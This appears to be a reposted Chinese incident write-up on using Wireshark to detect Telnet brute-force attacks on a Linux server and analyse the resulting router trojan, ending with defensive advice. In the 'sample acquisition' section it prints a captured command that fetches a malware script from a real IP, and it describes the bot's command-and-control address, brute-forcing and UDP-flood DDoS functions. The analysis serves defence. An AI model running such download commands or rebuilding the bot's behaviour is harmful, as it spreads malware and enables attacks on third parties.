首页 置换 选车 估价 问答 生活 经销商 车管所 汽车资讯 汽车销量 车牌查询 今日油价 天气预报
您的位置: 首页 > 生活 > 科技 > wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)
wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)
更新时间:2024-07-04 07:47:07

路由器木马,其主要目标是控制网络的核心路由设备;一旦攻击成功,其危害性远大于一台主机被控。

如果仅仅在路由器上面防范该类木马,那也是不够的,有很多Linux服务器违规开放Telnet端口,且使用了弱口令,一样可以中招。下面我们就一起来回顾一起真实案例。

0x01 发现异常

在对客户某服务器区域进行安全监测时发现某服务器通信流量存在大量Telnet协议。截取一段数据,进行协议统计:

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)1

Telnet协议一般为路由器管理协议,服务器中存在此协议可初步判断为异常流量。继续进行端口、IP走向统计:发现大量外部IP通过Tcp23端口(Telnet)连接该服务器。

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)2

此统计可说明:

该服务器违规开放了TCP23端口;

该服务器遭到大量Telnet攻击,有可能是暴力破解,也有可能是已经成功连接。

挑选通信量较大的IP,筛选通信双向数据:

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)3

查看Telnet数据,发现已经成功连接该服务器。

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)4

数据中还存在大量Telnet扫描探测、暴力破解攻击,在此不再详述。

0x02 获取样本

为进一步查看Telnet通信内容,Follow TcpStream。

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)5

将内容复制粘贴至文本编辑器:

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)6

发现一段自动下载命令:

1

2

wget http://208.67.1.42/bin.sh;

wget1 http://208.67.1.42/bin2.sh。

连接http://208.67.1.42/bin.sh可发现该脚本文件内容为自动下载获取木马,且木马可感染arm、MIPS、x86、PowerPC等架构的设备。

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)7

0x03 木马分析

(注:本章节不属于Wireshark分析范畴,本文仅以jackmyx86分析为例)

该木马文件是ELF格式的,影响的操作系统包括:

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)8

从上图中判断木马下载的类型分别是:Mipsel,misp,x86(其实这个是x64),arm,x86(i586,i686)等。

从截获的*.sh文件看,*.sh脚本想删除这些目录和内容,并且关闭一些进程。

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)9

首先得到了一个”Art of war”的字符串(看来黑客是个文艺青年)。

接着尝试打开路由器配置文件。

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)10

在配置文件里查找字符串00000000,如果找到就直接填充0;

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)11

在初始化函数中:尝试建立socket连接,连接地址为:208.67.1.194:164。

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)12

尝试连接服务器,等待远端服务器应答。

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)13

服务器发送“ping”命令后,客户端返回“pong”表示已经连接成功。当发送“GETLOCALIP”后,返回控制端的本机IP。当服务器发送SCANNER后,根据ON或者OFF来控制是否要扫描指定IP,进行暴力破解。当发送“UDP”命令时候,向指定的IP地址发送大量UDP无效数据包。

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)14

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)15

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)16

下图是木马尝试获得路由器的用户名和密码匹配,企图暴力破解账户和密码。

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)17

在被控制之后,跟随服务器指定的IP,发送大量随机生成的长度为0x400的字符串数据,进行DDOS攻击。下图是发送垃圾数据,进行DDOS攻击。

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)18

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)19

随机数据生成的伪代码如下:

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)20

根据网址追溯到攻击者的网页和twitter账号。

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)21

wireshark 抓wifi密码(WireShark黑客发现之旅8-针对路由器Linux木马)22

0x04 总结

路由器的管理如非必须,尽量不开放互联网管理通道

路由器管理密码必须强口令、最好超强

Linux服务器一般不要打开Telnet服务

该木马一般利用爆破和漏洞来攻击路由器或开启Telnet服务的Linux服务器,中招后接受木马作者的控制,最后进行大量DDOS攻击

,
相关推荐RECOMMEND
迷你世界是所有沙盒游戏鼻祖(沙盒游戏迷你世界电脑版和手机版有哪些不同)
相信大家都知道沙盒游戏迷你世界的下载量还不错,毕竟它的开发商是我国深圳的迷你玩公司,对于国内市场的了解还是比较精准的,除了电脑上可以玩到迷你世界之外呢,在手游上也有相关作品,那么今天丸子就想来和大家聊...
华为平板mediapad-t2(小幅升级HUAWEI华为)
由于Android很少有专门为平板优化的应用,大部分Android平板仅仅相当于一个放大版的Android手机,所以体验并不是很好。Google(谷歌)曾经推出Android3.0,试图打造一个专门的...
植物大战僵尸手机版怎么使用修改器(有什么方法)
植物大战僵尸手机版怎么使用修改器?植物大战僵尸是一个看似简单实则极富策略性的小游戏,修改器可以轻松地修改游戏中的很多属性,比如说无限阳光、3倍墙果抵挡植物大战僵尸修改器是一款中文版的属性修改器,玩家必...
windows7旗舰版怎么恢复出厂设置(电脑救急技巧)
windows7旗舰版怎么恢复出厂设置?在电脑开机的过程中;多次按下F8,进入Windows7的高级启动选项,选择【修复计算机】;,今天小编就来聊一聊关于windows7旗舰版怎么恢复出厂设置?接下来...
win10如何重装为win7(win10直接重装成win7系统的详细步骤)
以前win7升级win10后可以30天内还原win7,现在则只有10天,超过10天就需要重装回win7系统,另外如果是自带win10的新机型重装win7还需要改BIOS和硬盘分区表,很是麻烦,那么wi...
apc控制系统基本组成(APC系统简述)
apc控制系统基本组成?随着过程工业日益走向大型化、集成化、连续化、复杂化,对APC软件的核心部件主要多变量模型辨识、多变量预测某一个变量,或几个变量的平稳操作,而是越来越多地加入了以基础的控制技术已...